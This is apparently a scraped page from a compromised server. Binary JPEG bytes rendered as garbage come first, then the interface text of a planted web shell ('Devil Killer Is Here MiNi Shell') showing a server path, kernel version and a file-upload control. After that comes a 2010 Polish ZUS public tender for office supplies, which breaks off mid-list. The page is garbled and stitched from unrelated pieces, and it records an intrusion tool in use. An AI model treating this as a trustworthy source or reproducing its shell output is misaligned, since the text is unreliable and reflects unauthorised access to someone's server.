JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100723/222060-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa materiałów piśmiennych, kopert, kalkulatorów i niszczarekdla III Oddziału ZUS w   Warszawie.</b><br>
<b>Numer ogłoszenia: 222060 - 2010; data zamieszczenia: 23.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych III Oddział w Warszawie , ul. Senatorska 6/8, 00-917 Warszawa, woj. mazowieckie, tel. 022 8319194/95, faks 022 5382549.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów piśmiennych, kopert, kalkulatorów i niszczarekdla III Oddziału ZUS w   Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów piśmiennych, kopert,kalkulatorów i niszczarek z podziałem na cztery zadania (części). Zadanie 1 - dostawa materiałów piśmiennych.
Zadanie 2 - dostawa kopert. Zadanie 3 - dostawa kalkulatorów. 
Zadanie 4 - dostawa niszczarek..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.30-1, 30.10.00.00-0, 30.14.10.00-9, 30.19.10.00-4, 39.54.11.20-3, 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium 
w wysokości: 3 500,00 zł ( słownie: trzy tysiące pięćset złotych) w tym na:
Zadanie 1 - 1 500,00 zł (słownie: jeden tysiąc pięćset  złotych).
Zadanie 2 - 1 700,00 zł(słownie: jeden tysiąc siedemset złotych).
Zadanie 3 -    200,00 zł(słownie: dwieście złotych).
Zadanie 4 -    100 (słownie: sto złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniena tego warunku na podstawie oświadczenia, o którym mowa w art. 44 ustawy prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniena tego warunku na podstawie oświadczenia, o którym mowa w art. 44 ustawy prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniena tego warunku na podstawie oświadczenia, o którym mowa w art. 44 ustawy prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniena tego warunku na podstawie oświadczenia, o którym mowa w art. 44 ustawy prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniena tego warunku na podstawie oświadczenia, o którym mowa w art. 44 ustawy prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualny odpis z Krajowego Rejestru Sądowego lub zaswiadczenie o wpisie do ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Referat Zamówień Publicznych III O/ZUS, w pok. 406, 
przy ul. Senatorskiej 10 w Warszawie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2010 godzina 09:30, miejsce: Samodzielny Referat Zamówień Publicznych III O/ZUS, w pok. 406, 
przy ul. Senatorskiej 10 w Warszawie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów piśmiennych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiały piśmienne i biurowe
1.Bloczki samoprzylepne, kolor żółty, zielony 100 kartek.  Kod CPV 22816000-3, jednostka miary: sztuki, ilość 700. 2.Datownik  plastikowy, automatyczny, zaczynający się od roku 2010. Kod CPV 30192150-7 jednostka miary: sztuki, ilość 150. 3.Pióro kulkowe- automatycznie chowany wkład, posiadające szybkoschnący tusz pigmentowy, średnica kulki piszącej ok. 0,7 mm, grubość linii pisania ok. 0,3 mm, wymienny wkład, kolor wkładu niebieski. Kod CPV 30192121-5, jednostka miary: sztuki, ilość 40. 4.Długopis na sprężynce z wymiennym wkładem, kolor wkładu niebieski. Kod CPV 30192121-5, jednostka miary; sztuki, ilość 200.
5.Długopis automatyczny, korpus długopisu w dowolnym kolorze, wykonany z lśniącego tworzywa sztucznego, obudowa dzielona w 1/3 wysokości, obie części korpusu oddzielone mosiężno- niklowaną obrączką, metalowe elementy dolnej części korpusu trwale związane z elementami plastikowymi, wymienny wkład wielkopojemny z dokumentalnym tuszem w kolorze niebieskim, średnica kulki: 0,8 mm, szerokość linii pisania: 0,6 - 0,7 mm, długość linii pisania - 2 500 m. Kod CPV 30192121-5, jednostka miary: sztuki, ilość 1 200. 6.Dziurkacz metalowy, duży.  Kod CPV 30191000-4, jednostka miary: sztuki ilość 25. 7.Dziurkacz z metalową podstawą, ramię plastikowe, wskaźnik środka stron dziurkujący min. 25 kartek. Kod CPV 30191000-4, jednostka miary: sztuki, ilość 120. 8.Gumka wykonana z kauczuku syntetycznego, do ścierania grafitów różnych twardości, Kod CPV 30192100-2, jednostka miary: sztuki, ilość 300. 9.Kalka maszynowa A-4, kolor czarny, opakowanie 100 szt. Kod CPV 21231100-2, jednostka miary: opakowanie, ilość 20. 10.Klej w sztyfcie, zmywalny, uniwersalny, nietoksyczny. Kod CPV 24910000-6, jednostka miary: sztuki, ilość 1 000. 11.Korektor nylonowy, symbol 5 Stk. Gr. 169 do maszyn: Erika, Optima. Kod CPV 30192300-4, jednostka miary: sztuki, ilość 50. 12.Koszulki przezroczyste, groszkowe do segregatorów, format A-4, wykonana z folii o grubości minimum 48 mic., opakowanie 100 szt. Kod CPV 19520000-7, jednostka miary: opakowanie, ilość 1 000. 13.Koszulki przezroczyste, groszkowe do segregatorów, format A-5, wykonana z folii o grubości minimum 45 mic., opakowanie - 100 szt. Kod CPV 19520000-7, jednostka miary: opakowanie, ilość 100. 14.Nożyczki wykonane z nierdzewnej stali, ergonomicznie wyprofilowane uchwyty zapewniające wygodę użytkowania, długość ostrza 10 cm, uchwyt wykonany z czarnego tworzywa, całkowita długość nożyczek 21 cm. Kod CPV 39241200-5, jednostka miary: sztuki, ilość 150. 15.Maczałka glicerynowa, pojemność 20 ml. Kod CPV 30192111-2, jednostka miary: sztuki, ilość 50. 16.Flamastry biurowe, zaokrąglona końcówka, kolory: czarny ilość 1800, czerwony ilość 500, niebieski ilość 800. Kod CPV 30192125-3, jednostka miary: sztuki.
17.Marker - ścięta końcówka, wodoodporny, atrament z formułą DRY SAFE, szerokość linii pisania ok. 2 - 5mm, kolor czarny. Kod CPV 30192125-3, jednostka miary: sztuki, ilość 150. 18.Ofertówka plastikowa na dokumenty, A-4, jedna strona przezroczysta otwarta od góry i z prawej strony, tylna sztywna, kolorowa. Kod CPV 19520000-7, jednostka miary: sztuki, ilość 2 000. 19.Ołówek wykonany z żywicy syntetycznej, niełamliwy, twardość HB/2, bez gumki. Kod CPV 30192130-1, jednostka miary: sztuki, ilość 1 000. 20.Poduszka do stempli, w kolorze: czarnym ilość 15 , czerwonym ilość 5. Kod CPV 30192111-2 jednostka miary: sztuki.
21.Przekładki z kolorowego plastiku w pięciu kolorach, opakowanie - 10 kart. Kod CPV 19520000-7, jednostka miary: opakowanie, ilość 100. 22.Rozszywasz. Kod CPV 30192000-1, jednostka miary: sztuki, ilość 80 do zszywek 24/6, 26/6, i nr 10.
23.Segregator A-4, na dwa ringi, szerokość 7 cm, w sztywnej oprawie tekturowej, kolor biało-czarny, posiadający mechanizm dźwigniowy. Kod CPV 22850000-3, jednostka miary: sztuki, ilość 1 300. 24.Segregator A-4, na dwa ringi, szerokość 7 cm, w sztywnej oprawie lakierowanej, posiadający mechanizm dźwigniowy. Kod CPV 22850000-3, jednostka miary: sztuki, ilość 950. 25.Segregator A-4, na dwa ringi, szerokość 5 cm, w sztywnej oprawie lakierowanej, posiadający mechanizm dźwigniowy. Kod CPV 22850000-3, jednostka miary: sztuki, ilość 250. 26.Segregator A-5, na dwa ringi, szerokość 7 cm, w sztywnej oprawie lakierowanej, posiadający mechanizm dźwigniowy. Kod CPV 22850000-3, jednostka miary: sztuki ilość 80. 27.Skoroszyt A-4, plastikowy, z wąsem, Kod CPV 19520000-7, jednostka miary: sztuki, ilość 1 500. 28.Skoroszyt A-4, tekturowy, wykonany z kartonu o grubości minimum 250 g/m2, kolor biały. Kod CPV 22851000-0, jednostka miary: sztuki, ilość 500. 29.Skoroszyt plastikowy A-4, z wąsem, boczna perforacja umożliwiająca zawieszanie w segregator. Kod CPV 19520000-7, jednostka miary: sztuki, ilość 500. 30.Skorowidz alfabetyczny, format A-4, w kratkę, 96 kartek, twarda oprawa. Kod CPV 22815000-6, jednostka miary: sztuki, ilość 150.
31.Skorowidz alfabetyczny, format A-5, w kratkę, 96 kartek, twarda oprawa. Kod CPV 22815000-6, jednostka miary: sztuki, ilość 100. 32.Spinacze metalowe, krzyżowe, duże, wysokość 41 mm, opakowanie - 50 szt. Kod CPV 30192000-1, jednostka miary: opakowanie, ilość 80. 33.Spinacze plikowe, duże, metalowe, długość 50 mm, opakowanie 100 szt. Kod CPV 30192000-1, jednostka miary: opakowanie, ilość 100. 34.Spinacze biurowe, metalowe, okrągłe długość 25 mm lub 28 mm, opakowanie - 100 sztuk. Kod CPV 30192000-1, jednostka miary: opakowanie, ilość 800. 35.Taśma maszynowa barwiąca nylonowa do maszyn: Erika 3004, 3006, Optima SP 22c, SP 22c-n. Kod CPV 30192300-4, jednostka miary: sztuki, ilość 100. 36.Taśma barwiąca, czerwono-czarna do maszyn liczących Casio, Canon, wymagana długość - 6 m, szerokość - 13 mm. Kod CPV 30192300-4, jednostka miary: sztuki, ilość 500. 37.Taśma Casio, papierowa offsetowa, szerokość 69 mm, papier bezpyłowy, bezdrzewny, długość 25 m. Kod CPV 30192300-4, jednostka miary: sztuki, ilość 300. 38.Taśma Elka, papierowa offsetowa, szerokość 57 mm, papier bezpyłowy, bezdrzewny, długość 25 m. Kod CPV 30192300-4, jednostka miary: sztuki, ilość 2 000. 39.Taśma klejąca, z folii z PP o grubości całkowitej 43 mic. na bazie kleju Hot Melt  szara, szerokość 50 mm, długość minimum 50 m. Kod CPV 19520000-7, jednostka miary: sztuki, ilość 300.
40.Taśma klejąca, papierowa, na klej wodny, szer. 50mm, długość minimum 200 m. Kod CPV 19520000-7, jednostka miary: sztuki, ilość 100. 41.Taśma biurowa, idealnie przezroczysta, klejąca, szerokość 18 mm. Kod CPV 19520000-7, jednostka miary: sztuki, ilość 1 200. 42.Teczka do podpisu, A-4, w twardej oprawie, różne kolory. Kod CPV 22852100-8 jednostka miary: sztuki, ilość 40. 43.Teczka ofertówka A-4, okładka plastikowa, posiadająca minimum 40 koszulek. Kod CPV 19520000-7, jednostka miary: sztuki, ilość 60. 44.Teczka wiązana A-4, plastikowa. Kod CPV 19520000-7, jednostka miary: sztuki, ilość 1 000. 45.Teczka na dokumenty zamykana na gumkę, format A-4. Kod CPV 22852100-8, jednostka miary: sztuki, ilość 1 200. 46.Temperówka metalowa pojedyncza wykonana ze specjalnego stopu magnezu. Kod CPV 30192000-1, jednostka miary: sztuki, ilość 150. 47.Tusz do stempli gumowych i polimerowych, kolor czarny ilość 500, kolor czerwony ilość 50, kolor niebieski ilość 50. Kod CPV 24330000-6, jednostka miary: sztuki. 48.Wąsy metalowe, długość 175 mm, opakowanie 100 szt. Kod CPV 30192000-1, jednostka miary: opakowanie, ilość 700. 49.Wąsy z plastikowymi podkładkami do skoroszytów, opakowanie - 25 sztuk. Kod CPV 30192000-1, jednostka miary: opakowanie, ilość 250. 50.Wkład cienki do długopisu, kolor niebieski, długość 105 mm, ze skrzydełkami. Kod CPV 30192000-1, jednostka miary: sztuki, ilość 250. 51.Wkład do długopisu, grubość linii pisania ok. 0,3 mm, kolor: niebieski. Kod CPV 30192000-1, jednostka miary: sztuki, ilość 150. 52.Wkład metalowy, wielkopojemny z dokumentalnym tuszem, szerokość linii pisania od 0,6 - 0,7 mm, kolor: niebieski. Kod CPV 30192000-1, jednostka miary: sztuki, ilość 2 400. 53.Zakreślacz fluorescencyjny, płynny tusz, kolory: zielony, ilość 500, żółty ilość 450, różowy ilość 250. Kod CPV 30192000-1, jednostka miary: sztuki. 54.Brulion A-4, twarda oprawa, w kratkę, minimum 96 kartek, papier o gramaturze 60 g/ m2. Kod CPV 22815000-6, jednostka miary: sztuki, ilość 650. 55.Zeszyt, twarda okładka, format A-5, w kratkę, minimum 80 kartek. Kod CPV 22815000-6, jednostka miary: sztuki, ilość 600. 56.Zszywacz: metalowa konstrukcja. Kod CPV 30192000-1, jednostka miary: sztuki, ilość 150. 57.Zszywki metalowe - 24/6 ,opakowanie 1 000 sztuk. Kod CPV 30192000-1, jednostka miary: opakowanie, ilość 1 500. 58.Duży zszywacz biurowy, wykonany z wysokiej jakości wytrzymałego tworzywa, matowy miękki uchwyt. Kod CPV 30192000-1, jednostka miary: sztuki ilość 15. 59.Zszywki metalowe - 23/10,opakowanie 1 000 sztuk. Kod CPV 30192000-1, jednostka miary: opakowanie, ilość 120. 60.Zszywacz mini: obudowa wykonana z wytrzymałego tworzywa sztucznego. Kod CPV 30192000-1, jednostka miary: sztuki, ilość 10.
61.Papier do faksów 210 mm/dł. 30 m. KOD CPV 22993200-9, jednostka miary: sztuki, ilość 700. 62.Torebki zasiłkowe wykonane z przezroczystej folii o grubości 0,12 mm. otwierane z krótszego boku - U. Kod CPV 19520000-7, jednostka miary: sztuki, ilość 240. 63.Zszywki nr 10, do zszywacza mini, opakowanie 1 000 sztuk. Kod CPV 30192000-1, jednostka miary opakowanie, ilość 30. 64.Dziurkacz archiwizacyjny czterootworowy: metalowy pozwalający na jednorazowe dziurkowanie bez wysiłku co najmniej 300 kartek papieru 80g/m2. Kod CPV 30191000-4, jednostka miary: sztuki, ilość 1. 65.Dratwa do zszywania dokumentacji, opakowanie 0,5 kg, jednostka miary: opakowanie, ilość 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-0, 39.54.11.20-3, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa kopert.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa kopert
1.Koperta DL biała, samoklejąca z okienkiem po prawej stronie: wymiary okienka: 45x90 mm - wymiary koperty: 110x220 mm, - gramatura 80g/m 2 opakowanie 1 000 sztuk, 785 opakowań. 2.Koperta DL biała, samoklejąca- wymiary koperty: 110x220 mm, - gramatura 80g/m 2 opakowanie 1 000 sztuk, 14 opakowań. 3.Koperta C6 biała, samoklejąca z okienkiem po prawej stronie,  wymiary okienka 45x90 mm, wymiary koperty: 114 x 162 mm - gramatura 75g/m2 opakowanie 1 000 sztuk, 30 opakowań. 4.Koperta C6 bez okienka, biała, samoklejąca: - wymiary koperty: 114 x 162 mm - gramatura 75g/m2 opakowanie 1 000 sztuk. 47 opakowań.
5.Koperta aktowa E 4 szara, samoklejąca: - szerokość boku: 40 mm, - wymiary koperty: 280x400 mm - gramatura 140g/m2 opakowanie 100 sztuk, 390 opakowań.
6.Koperta aktowa E 4 brązowa, samoklejąca: - szerokość boku: 40 mm, - wymiary koperty: 280x400 mm - gramatura 140g/m2 opakowanie 100 sztuk, 60 opakowań.
7.Koperta aktowa B 4 szara, samoklejąca: - wymiary koperty: 250x353 mm - gramatura 90g/m2 opakowanie 250 sztuk, 225 opakowań. 8.Koperta aktowa B 4 brązowa, samoklejąca: - wymiary koperty: 250x353 mm - gramatura 90g/m2 opakowanie 250 sztuk, 28 opakowań. 9.Koperta C-4 HK biała, z poddrukiem samoklejąca z okienkiem po prawej stronie: - wymiary okienka: 55x90mm, - wymiary koperty: 229x324mm - gramatura 90g/m2 opakowanie 250 sztuk, 130 opakowań. 10.Koperta C5 szara , klejona na mokro: wymiary koperty 162x229 mm, gramatura 90 g/m2  opakowanie 500 szt.,260 opakowań. 11.Koperta C5 biała , klejona na mokro: wymiary koperty 162x229 mm, gramatura 90 g/m2  opakowanie 500 szt., 120 opakowań. 12.Koperta C4 szara , klejona na mokro: wymiary koperty 229x324 mm, gramatura 90 g/m2  opakowanie 250 szt., 180 opakowań. 13.Koperta C4 biała , samoklejąca: wymiary koperty 229x324 mm, gramatura 90 g/m2  opakowanie 250 szt., 60 opakowań. 14.Koperta z warstwą folii bąbelkowej, biała: wymiary wewnętrzne koperty  165x175 mm. Gramatura standardowa, opakowanie 100 szt., 10 opakowań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa kalkulatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kalkulatory biurowe:
- Zasilany energią słoneczną i bateriami, - 12 pozycyjny wyświetlacz ciekłokrystaliczny, - działania algebraiczne, -funkcja automatycznego wyłączania zasilania, - dwa przyciski kierunkowe, - funkcja obliczania koszt/ cena sprzedaży / marża, - pamięć podwójna, - klawisz podwójnego i potrójnego zera, - cofanie ostatnio wprowadzonej pozycji, - funkcja sprawdzania i poprawiania obliczeń, = obliczenia podatkowe, - klawisz sumy całkowitej, - plastikowe klawisze, - metalowa obudowa, - korekta ostatniej cyfry, - działania w trybie stało lub zmiennoprzecinkowym, 
Kalkulator z drukarką:
- 14- pozycyjny wyświetlacz, - dwukolorowy wydruk, - zaokrąglanie wyników,
- obliczenia marża, koszt: obliczania procentowe, - przełącznik liczby miejsc dziesiętnych, - sumy pośrednie oraz sumy łączne ze zliczaniem składników,
- konwersja walut z wykorzystaniem EURO, - funkcja obliczeń podatkowych TAX,
